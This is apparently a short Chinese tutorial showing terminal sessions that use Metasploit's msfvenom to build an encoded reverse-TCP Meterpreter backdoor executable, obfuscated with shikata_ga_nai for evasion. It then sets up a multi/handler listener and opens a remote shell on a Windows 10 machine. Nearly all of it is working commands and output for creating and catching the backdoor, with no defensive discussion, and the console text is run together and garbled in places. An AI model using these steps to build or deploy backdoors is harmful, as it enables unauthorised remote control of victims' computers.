通过Metasploit生成exe后门,拿Shell

[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.25 lport=6666 -f exe > ./lyshark.exeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadFound 1 compatible encodersAttempting to encode payload with 5 iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size 368 (iteration=0)x86/shikata_ga_nai succeeded with size 395 (iteration=1)x86/shikata_ga_nai succeeded with size 422 (iteration=2)x86/shikata_ga_nai succeeded with size 449 (iteration=3)x86/shikata_ga_nai succeeded with size 476 (iteration=4)x86/shikata_ga_nai chosen with final size 476Payload size: 476 bytesFinal size of exe file: 73802 bytes[root@localhost ~]# [root@localhost ~]# lslyshark.exe

[root@localhost ~]# msfconsole This copy of metasploit-framework is more than two weeks old. Consider running ‘msfupdate‘ to update to the latest version. ?????????????????????????????????????????????????%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ????%%% ????????%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ?%% ?%%%%%%%% ??%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ?% ?%%%%%%%% ??%%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%% ?%% ?%%%%%% ??%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ?%%%%%%%%% ??%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ?%%% ?%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ???%% ??%%%%%%%%%%% ?%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ?%%% ?%%%%%%%%% ?%% ?%% ?% ?????%% ?????%% ???%%%%% ?????% ???%%%% ?%% ??%%%%%% ??????%%%%%% ?%% ?%% ?% ?%%% %%%% ?%%%% ?%% ?%%%% ?%%%% ?%% %% ?%% %%% %% ?%%% ?%%%%%%%%% ?%%%%%% ?%% ??%%%%%% ??%%%% ?%%% ?%%%% ?%% ???%% ?%%% %%% %% ??%% ?%%%%%%%%%%%%%%%%% %%%% ????%%%%% ???%% ?%% ??% ???%% ?%%%% ?%%%% ??%%% ??%%% ????%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ?%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ?????????%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ??????=[ metasploit v4.16.55-dev- ???????????????????????]+ -- --=[ 1757 exploits - 1004 auxiliary - 306 post ??????]+ -- --=[ 536 payloads - 41 encoders - 10 nops ???????????]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]msf > 

msf > use exploit/multi/handlermsf exploit(multi/handler) > 

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > show optionsModule options (exploit/multi/handler): ??Name ?Current Setting ?Required ?Description ??---- ?--------------- ?-------- ?-----------Payload options (windows/meterpreter/reverse_tcp): ??Name ?????Current Setting ?Required ?Description ??---- ?????--------------- ?-------- ?----------- ??EXITFUNC ?process ?????????yes ??????Exit technique (Accepted: ‘‘, seh, thread, process, none) ??LHOST ?????????????????????yes ??????The listen address ??LPORT ????4444 ????????????yes ??????The listen portExploit target: ??Id ?Name ??-- ?---- ??0 ??Wildcard Target

msf exploit(multi/handler) > set lhost 192.168.1.25lhost => 192.168.1.25msf exploit(multi/handler) > set lport 6666lport => 6666

msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.25:6666 [*] Sending stage (179779 bytes) to 192.168.1.10[*] Meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-06-02 02:24:17 -0400meterpreter > 

meterpreter > sysinfoComputer ???????: DESKTOP-CACDUANOS ?????????????: Windows 10 (Build 14393).Architecture ???: x64System Language : zh_CNDomain ?????????: WORKGROUPLogged On Users : 2Meterpreter ????: x86/windowsmeterpreter >